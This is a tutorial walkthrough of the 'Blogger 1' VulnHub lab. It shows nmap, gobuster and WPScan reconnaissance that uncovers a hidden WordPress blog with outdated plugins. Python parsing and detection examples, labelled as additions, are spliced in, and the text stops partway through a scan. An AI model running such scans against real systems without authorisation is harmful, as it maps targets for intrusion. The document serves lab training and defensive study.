Blogger: Blogger 1 || VulnHub Complete walkthrough


Hello everyone! Welcome, all of my viewers, to this brand-new video. Today, we're diving into a beginner-friendly vulnerable machine known as "Blogger 1" from the "Blogger" series. VulnHub categorizes the machine as "Easy and beginner level" in terms of difficulty.


To get started, head over to the VulnHub website and download the vulnerable image. If you're new to VulnHub, check out our VulnHub playlist for helpful videos.


Setting up

Once you've downloaded the image, the next step is setting up the server in VirtualBox. 

This process is quite simple and involves importing the OVA file into VirtualBox using the "Import Appliance" feature. However, there is a problem: when I try to start the virtual machine, it aborts automatically.

To resolve the problem, we'll need to extract the OVA file and manually install the VM.

First, we'll rename the OVA extension to ZIP.  

Since direct renaming isn't possible, open Command Prompt from this directory by typing "cmd" in the Address bar. This will open Command Prompt in the same directory. 

Use the "dir" command to list all directories and files, then rename the file with the "ren" command.

With the OVA extension changed to ZIP, we can now extract it using WinRAR.

After extraction, I discovered several helpful files, including two VMDK files.

Our next step involves creating a new virtual machine. In VirtualBox, click on "New" to create a new VM.

Name it "Blogger 1" and select the operating system type and version as Linux, Ubuntu (64-bit).

Proceed by allocating RAM size for your VM and click "Next".

Select " Use an existing virtual hard disk file " and import the VMDK file extracted earlier.

After clicking "Next," then "Finish," the setup is complete. 

Once the import is finished, you'll see the "Blogger 1" vulnerable machine listed in the VirtualBox Manager.

Select the virtual machine, go to "Settings", then "Storage", click on "Controller: SATA", and use the hard disk selector to add the second VMDK file.

Next, change the network adapter to "Host-only Adapter".

Now, start the VM. 

Finally, you'll notice that our Vulnerable Machine is ready, with a login prompt awaiting. Let's dive into the fun!


 

Enumeration

The initial step in our attack is enumeration, which involves identifying the IP address of our target machine using netdiscover. To do this, open a terminal and run "netdiscover -i" followed by the network interface name, which in this case is "eth1".

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.252.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                              
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.95.1    0a:00:27:00:00:02      1      60  Unknown vendor                                                             
 192.168.95.2    08:00:27:ce:c7:96      1      60  PCS Systemtechnik GmbH                                                     
 192.168.95.10   08:00:27:96:10:9f      1      60  PCS Systemtechnik GmbH 

From the scan results, we've obtained our target IP address: "192.168.95.10".


Network scanning using Nmap

Next, we'll conduct a network scan to identify open ports, a crucial step in the enumeration process. This helps us understand the attack surface and strategize targeted attacks. We'll use the popular Nmap tool for this task. 

Run "nmap -sC -sV" followed by the target IP address.

In this command, "-sC" performs a script scan using the default set of NSE scripts, while "-sV" enables version detection, allowing us to identify which service and version is running on each open port.

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-09 22:34 IST
Nmap scan report for 192.168.95.10
Host is up (0.00047s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)
|   256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA)
|_  256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Blogger | Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.88 seconds
                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ 

After completing the network scan, we discovered the presence of two open ports.

  • Port 22/TCP is running an SSH service, indicating that gaining access to the server with valid credentials will be straightforward.
  • Additionally, Port 80/TCP is hosting an HTTP service, suggesting that a vulnerable website may be accessible.
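To show what a practitioner does with this output once it comes off the terminal, here is an added Python example (not part of the original walkthrough) that parses nmap's text port table into structured records, attaching each NSE script line to its port. The sample input is constructed from the scan above; the function and field names are my own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: the port table from an `nmap -sC -sV` run against a
# lab host, in nmap's normal text output format (trimmed from the scan above).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.95.10
Host is up (0.00047s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)
|_  256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Blogger | Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# A port line looks like "22/tcp open  ssh     OpenSSH 7.2p2 ..."; the version
# column is optional because -sV does not always identify one.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# NSE script lines hang off the preceding port and start with "|" or "|_".
SCRIPT_LINE = re.compile(r"^\|_?\s?(.*)$")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)


def parse_nmap_ports(text):
    """Turn nmap's human-readable port table into PortRecord objects,
    attaching each NSE script line to the port it was printed under."""
    records = []
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            records.append(PortRecord(int(port), proto, state, service, (version or "").strip()))
            continue
        s = SCRIPT_LINE.match(line)
        if s and records:
            records[-1].scripts.append(s.group(1).strip())
    return records


def open_ports(records):
    """Sorted list of open port numbers: the quick attack-surface summary."""
    return sorted(r.port for r in records if r.state == "open")


def service_versions(records):
    """Map 'port/proto' -> version string for every open port, which is what a
    defender compares against an inventory to spot unexpected or stale services."""
    return {f"{r.port}/{r.proto}": r.version for r in records if r.state == "open"}


def script_output(records, port):
    """All NSE script lines nmap printed under the given port ([] if none)."""
    for r in records:
        if r.port == port:
            return list(r.scripts)
    return []


if __name__ == "__main__":
    recs = parse_nmap_ports(SAMPLE_NMAP_OUTPUT)
    print("open ports:", open_ports(recs))
    for key, ver in service_versions(recs).items():
        print(f"{key}: {ver}")
    print("ssh host keys:", script_output(recs, 22))
```

Feeding the parser `nmap -oN` output from a scheduled scan and diffing `service_versions()` against last week's result is the simplest way to catch a newly exposed port or a downgraded service on hosts you own.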

Let's explore the web content hosted on port 80. To do this, open a web browser of your choice and navigate to the target's IP address in the URL bar.

Upon visiting the site, it's evident that a website is being hosted on this port. Let's delve deeper into its web technology for a better understanding.

To accomplish this, we'll utilize Wappalyzer, a Firefox extension designed for identifying web technologies.

Upon analysis, we discover that the website is built with Bootstrap.

After a thorough examination, there doesn't seem to be anything noteworthy to enumerate on the webpage. 


Discovery of Hidden files and Directories with Gobuster

However, there might be hidden or difficult-to-access directories and pages, which we can explore through directory busting.

We'll use gobuster as our tool of choice, employing a few switches for optimal results. Specifically, "dir" selects directory enumeration mode, "-u" specifies the target URL, and "-w" specifies the path of the wordlist.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.95.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.95.10/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 315] [--> http://192.168.95.10/images/]
/assets               (Status: 301) [Size: 315] [--> http://192.168.95.10/assets/]
/css                  (Status: 301) [Size: 312] [--> http://192.168.95.10/css/]
/js                   (Status: 301) [Size: 311] [--> http://192.168.95.10/js/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ 

During directory enumeration, we discovered four directories: "images", "assets", "css", and "js". It seems these directories contain their respective static content.

Upon examining the images directory, I discovered the images used in the Bootstrap website.
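The same enumeration looks very different from the server's side: a gobuster run with the small wordlist generates tens of thousands of requests, most of them answered with 404. As an added example that is not part of the original post, the following Python detector reads constructed Apache combined-format log lines and flags any client that produces a burst of 404s inside a short window; the log lines, thresholds and function names are my own, and the User-Agent string matches gobuster's default as shown in the scan banner above.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log lines in Apache "combined" format. They imitate what a
# gobuster run leaves behind: a burst of 404s from one client with the tool's
# default User-Agent, plus ordinary traffic from another client.
SAMPLE_ACCESS_LOG = """\
192.168.95.2 - - [09/May/2024:22:40:01 +0530] "GET /images HTTP/1.1" 301 315 "-" "gobuster/3.6"
192.168.95.2 - - [09/May/2024:22:40:01 +0530] "GET /index2 HTTP/1.1" 404 275 "-" "gobuster/3.6"
192.168.95.2 - - [09/May/2024:22:40:01 +0530] "GET /news HTTP/1.1" 404 275 "-" "gobuster/3.6"
192.168.95.2 - - [09/May/2024:22:40:02 +0530] "GET /crack HTTP/1.1" 404 275 "-" "gobuster/3.6"
192.168.95.1 - - [09/May/2024:22:40:02 +0530] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/125.0"
192.168.95.2 - - [09/May/2024:22:40:02 +0530] "GET /serial HTTP/1.1" 404 275 "-" "gobuster/3.6"
192.168.95.2 - - [09/May/2024:22:40:03 +0530] "GET /2006 HTTP/1.1" 404 275 "-" "gobuster/3.6"
192.168.95.1 - - [09/May/2024:22:45:30 +0530] "GET /nope HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/125.0"
"""

# Apache combined log: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_access_log(text):
    """Parse combined-format lines into dicts; unparseable lines are skipped
    rather than aborting the run, since real logs contain junk."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        d = m.groupdict()
        events.append({
            "ip": d["ip"],
            "ts": datetime.strptime(d["ts"], TS_FORMAT),
            "path": d["path"],
            "status": int(d["status"]),
            "ua": d["ua"],
        })
    return events


def detect_dir_bruteforce(events, window_seconds=60, threshold=5):
    """Flag a client the first time it produces `threshold` 404 responses
    inside a sliding window of `window_seconds`. Returns {ip: details}."""
    recent = defaultdict(deque)          # ip -> timestamps of 404s still in the window
    not_found_paths = defaultdict(set)   # ip -> distinct paths that 404'd
    user_agents = defaultdict(set)       # ip -> User-Agents seen on those 404s
    alerts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["status"] != 404:
            continue
        ip = ev["ip"]
        q = recent[ip]
        q.append(ev["ts"])
        not_found_paths[ip].add(ev["path"])
        user_agents[ip].add(ev["ua"])
        # Evict 404s that fell out of the window.
        while q and (ev["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = {
                "first_alert_at": ev["ts"].isoformat(),
                "distinct_404_paths": len(not_found_paths[ip]),
                "user_agents": sorted(user_agents[ip]),
            }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_dir_bruteforce(parse_access_log(SAMPLE_ACCESS_LOG)).items():
        print(f"possible directory brute force from {ip}: {info}")
```

The 404 rate is the robust signal; the User-Agent is only corroboration, since a scanner can set any string it likes. Tune `threshold` and `window_seconds` against a baseline of your own site's normal 404 noise before wiring this into alerting.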

However, there didn't seem to be any interesting files. Let's proceed to the next directory.

After some investigation, I stumbled upon an intriguing directory named "blog" within the "fonts" directory under "assets" (http://192.168.95.10/assets/fonts/blog/).

Upon accessing the blog directory, I encountered another webpage that appeared to be broken.

Let's analyze its web technology, which might provide insights for gaining a foothold in the web app. Using Wappalyzer, I determined that the broken webpage is running WordPress.


WordPress Security Assessment with WPScan

As it's a WordPress website, this means we can potentially enumerate and identify vulnerabilities using WPScan. 

If you're unfamiliar with WPScan and how it's used to enumerate WordPress websites, I recommend reading this article for a comprehensive overview.

Now, let's move forward with scanning the WordPress blog to uncover details such as the WordPress version, theme information, plugin details, and security-related headers. Open a new terminal window and enter the command "wpscan --url" followed by the URL of the WordPress site you want to scan.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://192.168.95.10/assets/fonts/blog/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.95.10/assets/fonts/blog/ [192.168.95.10]
[+] Started: Thu May  9 22:45:25 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.95.10/assets/fonts/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.95.10/assets/fonts/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.95.10/assets/fonts/blog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.95.10/assets/fonts/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'WordPress 4.9.8'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu May  9 22:45:38 2024
[+] Requests Done: 164
[+] Cached Requests: 4
[+] Data Sent: 46.142 KB
[+] Data Received: 99.736 KB
[+] Memory used: 226.84 MB
[+] Elapsed time: 00:00:12
                                                                                                                               
┌──(kali㉿kali)-[~]
└─$

After the scan, WP Scan will provide insights into the WordPress installation, including version numbers, theme information, detected plugins, and whether XML-RPC functionality is enabled. The scan results may highlight security concerns such as outdated software versions and exploitable features like XML-RPC, which attackers could target.

However, the scan did not provide plugin information. Let's run WPScan again to enumerate the plugins, this time using the "-e ap" flag (enumerate all plugins).

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://192.168.95.10/assets/fonts/blog/ -e ap
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.95.10/assets/fonts/blog/ [192.168.95.10]
[+] Started: Thu May  9 22:49:15 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.95.10/assets/fonts/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.95.10/assets/fonts/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.95.10/assets/fonts/blog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.95.10/assets/fonts/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'WordPress 4.9.8'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu May  9 22:49:26 2024
[+] Requests Done: 2
[+] Cached Requests: 27
[+] Data Sent: 674 B
[+] Data Received: 1.028 KB
[+] Memory used: 225.793 MB
[+] Elapsed time: 00:00:11
                                                                                                                               
┌──(kali㉿kali)-[~]
└─$

Still, WPScan hasn't provided us with any plugin information. By default, WPScan runs plugin enumeration in passive mode, as indicated in the WPScan help output. To address this, we need to switch the plugin detection mode to aggressive with "--plugins-detection aggressive".

        --detection-mode MODE                      Default: mixed
                                                  Available choices: mixed, passive, aggressive

Let's proceed with the scan again.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://192.168.95.10/assets/fonts/blog/ -e ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.95.10/assets/fonts/blog/ [192.168.95.10]
[+] Started: Thu May  9 22:52:47 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.95.10/assets/fonts/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.95.10/assets/fonts/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.95.10/assets/fonts/blog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.95.10/assets/fonts/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/, Match: 'WordPress 4.9.8'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:10:10 <=========================================> (105357 / 105357) 100.00% Time: 00:10:10
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
  | Location: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/
 | Last Updated: 2024-03-21T00:55:00.000Z
 | Readme: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.2
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.0.8 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/akismet/readme.txt

[+] wpdiscuz
  | Location: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/
 | Last Updated: 2024-04-24T07:42:00.000Z
 | Readme: http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt
 | [!] The version is out of date, the latest version is 7.6.18
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/, status: 200
 |
 | Version: 7.0.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu May  9 23:04:00 2024
[+] Requests Done: 105367
[+] Cached Requests: 32
[+] Data Sent: 31.703 MB
[+] Data Received: 14.162 MB
[+] Memory used: 435.488 MB
[+] Elapsed time: 00:11:12
                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ 

Upon receiving the results, it shows that two outdated plugins are installed within WordPress: Akismet and wpdiscuz.

Since they are outdated, they are likely vulnerable. You can verify this using AI tools or by searching on Google.
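WPScan's passive core-version detection and its aggressive plugin-version detection both come down to a few string matches, which is useful to understand when judging how much weight to give the "100%" and "80%" confidence figures above. The following added Python example (my own code, not WPScan's) re-implements the three matches named in the output, "Meta Generator", "Emoji Settings", and "Readme - Stable Tag" confirmed by "Readme - ChangeLog Section", over constructed HTML and readme.txt samples, and then performs the manual check this paragraph describes: comparing an installed version against the latest release or against a "Fixed in" version. The regexes, sample inputs and helper names are assumptions of this example.

```python
import re

# Constructed sample: the parts of a WordPress front page that leak the core
# version. These are the two markers WPScan reports as "Meta Generator" and
# "Emoji Settings" passive detections.
SAMPLE_HTML = """\
<html><head>
<meta name="generator" content="WordPress 4.9.8" />
<script type="text/javascript" src="http://192.168.95.10/assets/fonts/blog/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8"></script>
</head><body><p>Broken blog</p></body></html>
"""

# Constructed sample: the head of a plugin readme.txt as shipped in
# wp-content/plugins/<slug>/. "Stable tag:" gives the version; the first
# heading under "== Changelog ==" is used to confirm it.
SAMPLE_README = """\
=== Akismet Anti-Spam ===
Contributors: matt, ryan, andy
Requires at least: 4.0
Tested up to: 4.9
Stable tag: 4.0.8

== Changelog ==

= 4.0.8 =
*Release Date - 19 June 2018*
"""

GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="WordPress\s+([\d.]+)"', re.I)
EMOJI_RE = re.compile(r"wp-emoji-release\.min\.js\?ver=([\d.]+)", re.I)
STABLE_TAG_RE = re.compile(r"^Stable tag:\s*([\d.]+)", re.M | re.I)
CHANGELOG_RE = re.compile(r"==\s*Changelog\s*==.*?^=\s*([\d.]+)\s*=", re.S | re.M | re.I)


def version_tuple(v):
    """'4.9.8' -> (4, 9, 8). Non-numeric suffixes such as 'rc1' are dropped and
    missing components count as zero, so '5.3' compares equal to '5.3.0'."""
    parts = []
    for p in v.split("."):
        m = re.match(r"\d+", p)
        if not m:
            break
        parts.append(int(m.group()))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def core_version_from_html(html):
    """Return (version, evidence) where evidence names the markers that agreed.
    Returns (None, []) when nothing leaks. Disagreeing markers raise, because
    that itself needs a look (cached page, half-finished upgrade)."""
    found = {}
    m = GENERATOR_RE.search(html)
    if m:
        found["meta generator"] = m.group(1)
    m = EMOJI_RE.search(html)
    if m:
        found["emoji settings"] = m.group(1)
    if not found:
        return None, []
    versions = set(found.values())
    if len(versions) > 1:
        raise ValueError(f"conflicting version markers: {found}")
    return versions.pop(), sorted(found)


def plugin_version_from_readme(readme):
    """(version, confirmed): version from 'Stable tag:', confirmed when the
    changelog's top entry states the same version."""
    stable = STABLE_TAG_RE.search(readme)
    changelog = CHANGELOG_RE.search(readme)
    version = stable.group(1) if stable else (changelog.group(1) if changelog else None)
    confirmed = bool(stable and changelog and stable.group(1) == changelog.group(1))
    return version, confirmed


def is_older_than(found, reference):
    """True when the installed version is below `reference`. Use it both for
    'latest release' (outdated?) and for a finding's 'Fixed in' (affected?)."""
    return version_tuple(found) < version_tuple(reference)


if __name__ == "__main__":
    core, evidence = core_version_from_html(SAMPLE_HTML)
    print(f"WordPress {core} via {evidence}; affected by a 'Fixed in 4.9.9' finding: "
          f"{is_older_than(core, '4.9.9')}")
    plugin, confirmed = plugin_version_from_readme(SAMPLE_README)
    print(f"akismet {plugin} (confirmed={confirmed}); outdated vs 5.3.2: "
          f"{is_older_than(plugin, '5.3.2')}")
```

The readme-based plugin version is only as trustworthy as the file on disk: a site owner who removes readme.txt or the generator meta tag hides the version from this kind of check without fixing anything, which is why the real remediation is updating, not suppressing the markers.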

However, I'll demonstrate an effective way to check for vulnerabilities in these plugins.

The effective method involves using a WPScan API token.

WPScan provides 25 free API requests per day. To obtain a token, visit wpscan.com/register and register by providing some details.

After clicking the register button, you'll receive an email to verify your email address. Once verified, you'll be able to access the API token.

The next step is to provide this token to WPScan using the "--api-token" flag.

Now, let's run the scan again. 

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://192.168.95.10/assets/fonts/blog/ -e ap --plugins-detection aggressive --api-token o*************************************Q
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.95.10/assets/fonts/blog/ [192.168.95.10]
[+] Started: Thu May  9 23:22:19 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.95.10/assets/fonts/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
